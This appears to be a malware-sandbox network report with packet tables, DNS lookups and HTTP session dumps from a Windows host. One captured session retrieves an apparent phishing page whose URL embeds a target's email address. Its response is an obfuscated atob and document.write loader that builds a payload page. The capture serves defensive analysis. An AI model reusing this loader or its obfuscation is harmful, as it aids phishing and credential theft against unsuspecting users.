                                    Mar 24, 2025 07:21:28.808646917 CET60860443192.168.2.24142.251.32.100
                                    Mar 24, 2025 07:21:28.808708906 CET44360860142.251.32.100192.168.2.24
                                    Mar 24, 2025 07:21:28.808779955 CET60860443192.168.2.24142.251.32.100
                                    Mar 24, 2025 07:21:28.809025049 CET60860443192.168.2.24142.251.32.100
                                    Mar 24, 2025 07:21:28.809039116 CET44360860142.251.32.100192.168.2.24
                                    Mar 24, 2025 07:21:29.003943920 CET44360860142.251.32.100192.168.2.24
                                    Mar 24, 2025 07:21:29.004360914 CET60860443192.168.2.24142.251.32.100
                                    Mar 24, 2025 07:21:29.004394054 CET44360860142.251.32.100192.168.2.24
                                    Mar 24, 2025 07:21:36.777122974 CET443608172.19.122.66192.168.2.24
                                    Mar 24, 2025 07:21:36.777147055 CET443608172.19.122.66192.168.2.24
                                    Mar 24, 2025 07:21:36.777241945 CET60817443192.168.2.242.19.122.66
                                    Mar 24, 2025 07:21:36.777450085 CET60817443192.168.2.242.19.122.66
                                    Mar 24, 2025 07:21:36.964992046 CET443608172.19.122.66192.168.2.24
                                    Mar 24, 2025 07:21:39.008452892 CET44360860142.251.32.100192.168.2.24
                                    Mar 24, 2025 07:21:39.008531094 CET44360860142.251.32.100192.168.2.24
                                    Mar 24, 2025 07:21:39.008723974 CET60860443192.168.2.24142.251.32.100
                                    Mar 24, 2025 07:21:40.229382038 CET60860443192.168.2.24142.251.32.100
                                    Mar 24, 2025 07:21:40.229418039 CET44360860142.251.32.100192.168.2.24
                                    TimestampSource PortDest PortSource IPDest IP
                                    Mar 24, 2025 07:19:15.907533884 CET6351053192.168.2.241.1.1.1
                                    Mar 24, 2025 07:19:16.022826910 CET53635101.1.1.1192.168.2.24
                                    Mar 24, 2025 07:19:24.857562065 CET53536741.1.1.1192.168.2.24
                                    Mar 24, 2025 07:19:24.910402060 CET53503171.1.1.1192.168.2.24
                                    Mar 24, 2025 07:19:26.205630064 CET53564971.1.1.1192.168.2.24
                                    Mar 24, 2025 07:19:28.702358961 CET5572153192.168.2.241.1.1.1
                                    Mar 24, 2025 07:19:28.702613115 CET6459653192.168.2.241.1.1.1
                                    Mar 24, 2025 07:19:28.800458908 CET53645961.1.1.1192.168.2.24
                                    Mar 24, 2025 07:19:28.801032066 CET53557211.1.1.1192.168.2.24
                                    Mar 24, 2025 07:19:30.157797098 CET5376253192.168.2.241.1.1.1
                                    Mar 24, 2025 07:19:30.158314943 CET5291353192.168.2.241.1.1.1
                                    Mar 24, 2025 07:19:30.273133039 CET53537621.1.1.1192.168.2.24
                                    Mar 24, 2025 07:19:30.273459911 CET53529131.1.1.1192.168.2.24
                                    Mar 24, 2025 07:19:31.531034946 CET5689753192.168.2.241.1.1.1
                                    Mar 24, 2025 07:19:31.531202078 CET6280253192.168.2.241.1.1.1
                                    Mar 24, 2025 07:19:31.630140066 CET53568971.1.1.1192.168.2.24
                                    Mar 24, 2025 07:19:31.630356073 CET53628021.1.1.1192.168.2.24
                                    Mar 24, 2025 07:19:32.349001884 CET53596851.1.1.1192.168.2.24
                                    Mar 24, 2025 07:19:32.582530975 CET5766853192.168.2.241.1.1.1
                                    Mar 24, 2025 07:19:32.582699060 CET5656953192.168.2.241.1.1.1
                                    Mar 24, 2025 07:19:32.679200888 CET53576681.1.1.1192.168.2.24
                                    Mar 24, 2025 07:19:32.679860115 CET53565691.1.1.1192.168.2.24
                                    Mar 24, 2025 07:19:43.247538090 CET53527131.1.1.1192.168.2.24
                                    Mar 24, 2025 07:19:46.448148966 CET137137192.168.2.24192.168.2.255
                                    Mar 24, 2025 07:19:47.197770119 CET137137192.168.2.24192.168.2.255
                                    Mar 24, 2025 07:19:47.947798014 CET137137192.168.2.24192.168.2.255
                                    Mar 24, 2025 07:19:53.898698092 CET53638761.1.1.1192.168.2.24
                                    Mar 24, 2025 07:20:01.968106031 CET53636641.1.1.1192.168.2.24
                                    Mar 24, 2025 07:20:24.208595991 CET53619451.1.1.1192.168.2.24
                                    Mar 24, 2025 07:20:24.436719894 CET53518281.1.1.1192.168.2.24
                                    Mar 24, 2025 07:20:27.098316908 CET53639121.1.1.1192.168.2.24
                                    Mar 24, 2025 07:20:55.156769037 CET53503811.1.1.1192.168.2.24
                                    Mar 24, 2025 07:21:37.271236897 CET138138192.168.2.24192.168.2.255
                                    Mar 24, 2025 07:21:40.335942984 CET53521231.1.1.1192.168.2.24
                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                    Mar 24, 2025 07:19:15.907533884 CET192.168.2.241.1.1.10xdb1bStandard query (0)browser.events.data.msn.cnA (IP address)IN (0x0001)false
                                    Mar 24, 2025 07:19:28.702358961 CET192.168.2.241.1.1.10x6fbbStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                    Mar 24, 2025 07:19:28.702613115 CET192.168.2.241.1.1.10x804dStandard query (0)www.google.com65IN (0x0001)false
                                    Mar 24, 2025 07:19:30.157797098 CET192.168.2.241.1.1.10x9e3bStandard query (0)mo.zonqdkqezktw.esA (IP address)IN (0x0001)false
                                    Mar 24, 2025 07:19:30.158314943 CET192.168.2.241.1.1.10xcca2Standard query (0)mo.zonqdkqezktw.es65IN (0x0001)false
                                    Mar 24, 2025 07:19:31.531034946 CET192.168.2.241.1.1.10x1bacStandard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                    Mar 24, 2025 07:19:31.531202078 CET192.168.2.241.1.1.10x6a8Standard query (0)code.jquery.com65IN (0x0001)false
                                    Mar 24, 2025 07:19:32.582530975 CET192.168.2.241.1.1.10x98d2Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                    Mar 24, 2025 07:19:32.582699060 CET192.168.2.241.1.1.10xcf29Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                    Mar 24, 2025 07:19:16.022826910 CET1.1.1.1192.168.2.240xdb1bNo error (0)browser.events.data.msn.cnglobal.asimov.events.data.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                    Mar 24, 2025 07:19:16.022826910 CET1.1.1.1192.168.2.240xdb1bNo error (0)global.asimov.events.data.trafficmanager.netonedscolprdeus00.eastus.cloudapp.azure.comCNAME (Canonical name)IN (0x0001)false
                                    Mar 24, 2025 07:19:16.022826910 CET1.1.1.1192.168.2.240xdb1bNo error (0)onedscolprdeus00.eastus.cloudapp.azure.com20.42.72.131A (IP address)IN (0x0001)false
                                    Mar 24, 2025 07:19:28.800458908 CET1.1.1.1192.168.2.240x804dNo error (0)www.google.com65IN (0x0001)false
                                    Mar 24, 2025 07:19:28.801032066 CET1.1.1.1192.168.2.240x6fbbNo error (0)www.google.com142.251.32.100A (IP address)IN (0x0001)false
                                    Mar 24, 2025 07:19:30.273133039 CET1.1.1.1192.168.2.240x9e3bNo error (0)mo.zonqdkqezktw.es104.21.80.1A (IP address)IN (0x0001)false
                                    Mar 24, 2025 07:19:30.273133039 CET1.1.1.1192.168.2.240x9e3bNo error (0)mo.zonqdkqezktw.es104.21.96.1A (IP address)IN (0x0001)false
                                    Mar 24, 2025 07:19:30.273133039 CET1.1.1.1192.168.2.240x9e3bNo error (0)mo.zonqdkqezktw.es104.21.64.1A (IP address)IN (0x0001)false
                                    Mar 24, 2025 07:19:30.273133039 CET1.1.1.1192.168.2.240x9e3bNo error (0)mo.zonqdkqezktw.es104.21.48.1A (IP address)IN (0x0001)false
                                    Mar 24, 2025 07:19:30.273133039 CET1.1.1.1192.168.2.240x9e3bNo error (0)mo.zonqdkqezktw.es104.21.32.1A (IP address)IN (0x0001)false
                                    Mar 24, 2025 07:19:30.273133039 CET1.1.1.1192.168.2.240x9e3bNo error (0)mo.zonqdkqezktw.es104.21.16.1A (IP address)IN (0x0001)false
                                    Mar 24, 2025 07:19:30.273133039 CET1.1.1.1192.168.2.240x9e3bNo error (0)mo.zonqdkqezktw.es104.21.112.1A (IP address)IN (0x0001)false
                                    Mar 24, 2025 07:19:30.273459911 CET1.1.1.1192.168.2.240xcca2No error (0)mo.zonqdkqezktw.es65IN (0x0001)false
                                    Mar 24, 2025 07:19:31.630140066 CET1.1.1.1192.168.2.240x1bacNo error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                    Mar 24, 2025 07:19:31.630140066 CET1.1.1.1192.168.2.240x1bacNo error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                    Mar 24, 2025 07:19:31.630140066 CET1.1.1.1192.168.2.240x1bacNo error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                    Mar 24, 2025 07:19:31.630140066 CET1.1.1.1192.168.2.240x1bacNo error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                    Mar 24, 2025 07:19:32.679200888 CET1.1.1.1192.168.2.240x98d2No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                    • browser.events.data.msn.cn
                                    • mo.zonqdkqezktw.es
                                      • code.jquery.com
                                    • a.nel.cloudflare.com
                                    • c.pki.goog
                                    Session IDSource IPSource PortDestination IPDestination Port
                                    0192.168.2.2460845142.251.40.19580
                                    TimestampBytes transferredDirectionData
                                    Mar 24, 2025 07:20:08.222692013 CET202OUTGET /r/gsr1.crl HTTP/1.1
                                    Cache-Control: max-age = 3000
                                    Connection: Keep-Alive
                                    Accept: */*
                                    If-Modified-Since: Tue, 07 Jan 2025 07:28:00 GMT
                                    User-Agent: Microsoft-CryptoAPI/10.0
                                    Host: c.pki.goog
                                    Mar 24, 2025 07:20:08.312007904 CET223INHTTP/1.1 304 Not Modified
                                    Date: Mon, 24 Mar 2025 06:03:27 GMT
                                    Expires: Mon, 24 Mar 2025 06:53:27 GMT
                                    Age: 1001
                                    Last-Modified: Tue, 07 Jan 2025 07:28:00 GMT
                                    Cache-Control: public, max-age=3000
                                    Vary: Accept-Encoding
                                    Mar 24, 2025 07:20:08.318247080 CET200OUTGET /r/r4.crl HTTP/1.1
                                    Cache-Control: max-age = 3000
                                    Connection: Keep-Alive
                                    Accept: */*
                                    If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMT
                                    User-Agent: Microsoft-CryptoAPI/10.0
                                    Host: c.pki.goog
                                    Mar 24, 2025 07:20:08.408257961 CET222INHTTP/1.1 304 Not Modified
                                    Date: Mon, 24 Mar 2025 06:03:30 GMT
                                    Expires: Mon, 24 Mar 2025 06:53:30 GMT
                                    Age: 998
                                    Last-Modified: Thu, 25 Jul 2024 14:48:00 GMT
                                    Cache-Control: public, max-age=3000
                                    Vary: Accept-Encoding
                                    Mar 24, 2025 07:20:08.414997101 CET200OUTGET /r/r1.crl HTTP/1.1
                                    Cache-Control: max-age = 3000
                                    Connection: Keep-Alive
                                    Accept: */*
                                    If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMT
                                    User-Agent: Microsoft-CryptoAPI/10.0
                                    Host: c.pki.goog
                                    Mar 24, 2025 07:20:08.504606009 CET223INHTTP/1.1 304 Not Modified
                                    Date: Mon, 24 Mar 2025 06:01:25 GMT
                                    Expires: Mon, 24 Mar 2025 06:51:25 GMT
                                    Age: 1123
                                    Last-Modified: Thu, 25 Jul 2024 14:48:00 GMT
                                    Cache-Control: public, max-age=3000
                                    Vary: Accept-Encoding


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    0192.168.2.246082220.42.72.131443
                                    TimestampBytes transferredDirectionData
                                    2025-03-24 06:19:16 UTC473OUTPOST /OneCollector/1.0?cors=true&content-type=application%2Fx-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=c498711f02654edca8a715ca6e1cb4d4-dc31da17-845c-4cca-84e5-547d05dad708-6945&upload-time=1742797155074&w=0&anoncknm=al_app_anon&NoResponseBody=true HTTP/1.1
                                    Accept-Encoding: gzip, deflate
                                    Content-Length: 3656
                                    Content-Type: application/json; charset=UTF-8
                                    Host: browser.events.data.msn.cn
                                    Connection: Keep-Alive
                                    Cache-Control: no-cache
                                    2025-03-24 06:19:16 UTC3656OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 53 65 72 76 65 72 4c 6f 67 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 63 34 39 38 37 31 31 66 30 32 36 35 34 65 64 63 61 38 61 37 31 35 63 61 36 65 31 63 62 34 64 34 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 35 2d 30 33 2d 32 34 54 30 36 3a 31 39 3a 30 35 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 64 61 74 61 22 3a 7b 22 70 61 67 65 22 3a 7b 22 70 72 6f 64 75 63 74 22 3a 22 65 6e 74 77 69 6e 64 6f 77 73 64 61 73 68 22 2c 22 61 70 70 54 79 70 65 22 3a 22 77 69 6e 57 69 64 67 65 74 73 22 2c 22 6e 61 6d 65 22 3a 22 77 69 6e 70 32 62 61 63 6b 69 6e 67 61 70 70 22 2c 22 69 73 4d 6f 63 6b 45 6e 76 22 3a 66 61 6c 73 65 2c 22 68 6f 73 74 56 65 72 22 3a 22 35 32 34 2e 33 30 35 30 32 2e 33 30 2e 30 22 2c 22
                                    Data Ascii: {"name":"MS.News.Web.ServerLog","iKey":"o:c498711f02654edca8a715ca6e1cb4d4","time":"2025-03-24T06:19:05Z","ver":"4.0","data":{"page":{"product":"entwindowsdash","appType":"winWidgets","name":"winp2backingapp","isMockEnv":false,"hostVer":"524.30502.30.0","


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    1192.168.2.2460834104.21.80.14433600C:\Program Files\Google\Chrome\Application\chrome.exe
                                    TimestampBytes transferredDirectionData
                                    2025-03-24 06:19:30 UTC683OUTGET /8VVgl7/$christo@draftworx.com HTTP/1.1
                                    Host: mo.zonqdkqezktw.es
                                    Connection: keep-alive
                                    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                    sec-ch-ua-mobile: ?0
                                    sec-ch-ua-platform: "Windows"
                                    Upgrade-Insecure-Requests: 1
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                    Sec-Fetch-Site: cross-site
                                    Sec-Fetch-Mode: navigate
                                    Sec-Fetch-Dest: document
                                    Accept-Encoding: gzip, deflate, br, zstd
                                    Accept-Language: en-US,en;q=0.9
                                    2025-03-24 06:19:30 UTC1211INHTTP/1.1 200 OK
                                    Date: Mon, 24 Mar 2025 06:19:30 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Cache-Control: no-cache, private
                                    cf-cache-status: DYNAMIC
                                    vary: accept-encoding
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lHcL1ZxqD7AIQ9gAa0ZxJ8pmdfZfmmkb7%2FEFaJaBZF27xBZjyBLrOtRUUZXgnGKBZ3tXujUR%2FuGFl0Wz1OLbgpRUWQNYK3S6kftjK%2BKyxvx8SLrMKPsd6nLtJ5b0vR7LjYD2"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    server-timing: cfL4;desc="?proto=TCP&rtt=320&min_rtt=309&rtt_var=139&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2820&recv_bytes=1587&delivery_rate=10034739&cwnd=252&unsent_bytes=0&cid=79088eca9d5b4950&ts=203&x=0"
                                    Set-Cookie: XSRF-TOKEN=eyJpdiI6InB6Y2JUNkJ5NXBpYlFQQmdoQ1dIVnc9PSIsInZhbHVlIjoidTJEblVVM1dlbHplTlhLcHQrM0JDK2FiaFQ2YVhMOVhMTzYzczZiSVJzN2IzOWRHQStoWmZOOUNFNHFQL2JIYjE2MGFJY09CWTVjbE1tM2hMemttMzdTdENLODNBU2RZdVQ0MklRT1ZUcXdheG1NeEFPcGx2Z2k1bG40YzFTTnMiLCJtYWMiOiJkNjlhODY5NWI2OTZhMTMzYmY5NTA2NmZhY2M0MjNkYTAzYjRlZTJjYzQwZTQ0MmFkZTc2ZmQ0NjI1YmU0YWQ0IiwidGFnIjoiIn0%3D; expires=Mon, 24-Mar-2025 08:19:30 GMT; Max-Age=7200; path=/; secure; samesite=none
                                    2025-03-24 06:19:30 UTC764INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6a 42 4d 4d 57 68 4c 4e 31 63 30 4e 79 74 34 61 44 6c 50 4d 6c 67 76 55 33 70 77 57 55 45 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 57 6d 68 52 63 55 59 30 4d 46 52 4c 52 54 56 76 53 56 4e 58 4d 56 4d 31 55 44 5a 34 4e 6d 78 34 64 44 4a 49 57 47 68 58 61 46 6c 52 4e 6a 55 78 4f 46 5a 48 65 55 46 71 56 30 64 55 64 44 52 50 63 6d 5a 5a 64 44 5a 36 65 45 4e 34 61 48 52 4c 4c 7a 6c 45 61 58 64 69 4e 47 45 79 59 33 52 32 52 6b 31 42 59 58 6c 75 53 57 64 53 55 31 56 76 4f 57 39 34 61 6c 4e 55 65 6b 35 6d 56 30 74 30 5a 6d 6f 76 55 6c 6b 78 61 48 46 4e 62 46 70 34 61 6d 31 6c 56 55 4e 73 61 30 46 72 53 48 68 7a 65 55 78 72 4e 56 5a 43 55 44 49
                                    Data Ascii: Set-Cookie: laravel_session=eyJpdiI6IjBMMWhLN1c0Nyt4aDlPMlgvU3pwWUE9PSIsInZhbHVlIjoiWmhRcUY0MFRLRTVvSVNXMVM1UDZ4Nmx4dDJIWGhXaFlRNjUxOFZHeUFqV0dUdDRPcmZZdDZ6eEN4aHRLLzlEaXdiNGEyY3R2Rk1BYXluSWdSU1VvOW94alNUek5mV0t0ZmovUlkxaHFNbFp4am1lVUNsa0FrSHhzeUxrNVZCUDI
                                    2025-03-24 06:19:30 UTC1369INData Raw: 37 66 66 61 0d 0a 3c 73 63 72 69 70 74 3e 0a 65 41 77 41 4c 62 77 4b 70 51 20 3d 20 61 74 6f 62 28 22 61 48 52 30 63 48 4d 36 4c 79 39 42 62 69 35 36 62 32 35 78 5a 47 74 78 5a 58 70 72 64 48 63 75 5a 58 4d 76 4f 46 5a 57 5a 32 77 33 4c 77 3d 3d 22 29 3b 0a 6b 62 64 43 72 6d 4e 7a 72 42 20 3d 20 61 74 6f 62 28 22 62 6d 39 74 59 58 52 6a 61 41 3d 3d 22 29 3b 0a 6c 6d 71 65 6a 56 77 52 47 63 20 3d 20 61 74 6f 62 28 22 64 33 4a 70 64 47 55 3d 22 29 3b 0a 69 66 28 65 41 77 41 4c 62 77 4b 70 51 20 3d 3d 20 6b 62 64 43 72 6d 4e 7a 72 42 29 7b 0a 64 6f 63 75 6d 65 6e 74 5b 6c 6d 71 65 6a 56 77 52 47 63 5d 28 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 73 63 61 70 65 28 61 74 6f 62 28 27 50 43 46 45 54 30 4e 55 57 56 42 46 49 47 68 30 62 57 77 2b
                                    Data Ascii: 7ffa<script>eAwALbwKpQ = atob("aHR0cHM6Ly9Bbi56b25xZGtxZXprdHcuZXMvOFZWZ2w3Lw==");kbdCrmNzrB = atob("bm9tYXRjaA==");lmqejVwRGc = atob("d3JpdGU=");if(eAwALbwKpQ == kbdCrmNzrB){document[lmqejVwRGc](decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+
                                    2025-03-24 06:19:30 UTC1369INData Raw: 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f
                                    Data Ascii: OFpOOFpOOFpO++oOOFpOOFpO++oO++oO++oO++oOOFpO++oOOFpOOFpOOFpO++oOOFpO++oO++oO++oOOFpOOFpO++oOOFpOOFpOOFpOOFpO++oOOFpOOFpOOFpO++oO++oOOFpO++oO++oO++oOOFpO++oOOFpOOFpOOFpO++oO++oOOFpOOFpOOFpO++oOOFpOOFpOOFpO++oOOFpOOFpO++oO++oOOFpO++oOOFpO++oOOFpOOFpO++oO++o
                                    2025-03-24 06:19:30 UTC1369INData Raw: 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f
                                    Data Ascii: +oOOFpOOFpOOFpO++oO++oOOFpOOFpO++oO++oOOFpO++oO++oO++oOOFpOOFpO++oOOFpOOFpOOFpOOFpO++oOOFpOOFpOOFpO++oOOFpOOFpOOFpO++oO++oOOFpO++oOOFpOOFpOOFpO++oO++oOOFpO++oOOFpOOFpOOFpOOFpOOFpO++oOOFpOOFpOOFpO++oO++oO++oO++oO++oOOFpOOFpO++oOOFpO++oO++oO++oO++oOOFpOOFpO
                                    2025-03-24 06:19:30 UTC1369INData Raw: 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b
                                    Data Ascii: pOOFpO++oO++oOOFpO++oOOFpO++oOOFpOOFpOOFpO++oO++oOOFpOOFpO++oO++oOOFpO++oOOFpO++oO++oO++oO++oO++oOOFpO++oO++oO++oOOFpO++oO++oOOFpO++oO++oO++oO++oOOFpO++oO++oOOFpOOFpOOFpO++oOOFpO++oOOFpO++oOOFpOOFpOOFpO++oO++oOOFpO++oO++oOOFpOOFpOOFpO++oO++oO++oO++oO++oO+
                                    2025-03-24 06:19:30 UTC1369INData Raw: 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b
                                    Data Ascii: O++oOOFpOOFpO++oOOFpOOFpOOFpOOFpO++oOOFpOOFpOOFpO++oOOFpO++oOOFpO++oOOFpOOFpOOFpO++oOOFpO++oO++oO++oO++oOOFpOOFpOOFpO++oOOFpO++oO++oOOFpOOFpO++oO++oO++oOOFpO++oO++oOOFpOOFpO++oOOFpOOFpO++oO++oO++oOOFpOOFpO++oO++oO++oO++oOOFpO++oOOFpOOFpO++oOOFpOOFpOOFpO++
                                    2025-03-24 06:19:30 UTC1369INData Raw: 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f
                                    Data Ascii: ++oOOFpO++oOOFpOOFpOOFpOOFpO++oO++oOOFpO++oOOFpOOFpO++oO++oOOFpO++oO++oO++oOOFpOOFpO++oOOFpOOFpOOFpOOFpO++oOOFpOOFpOOFpO++oOOFpOOFpOOFpO++oOOFpOOFpO++oOOFpOOFpOOFpO++oO++oO++oOOFpO++oO++oO++oOOFpO++oO++oO++oOOFpO++oOOFpOOFpO++oO++oO++oO++oOOFpO++oO++oO++o
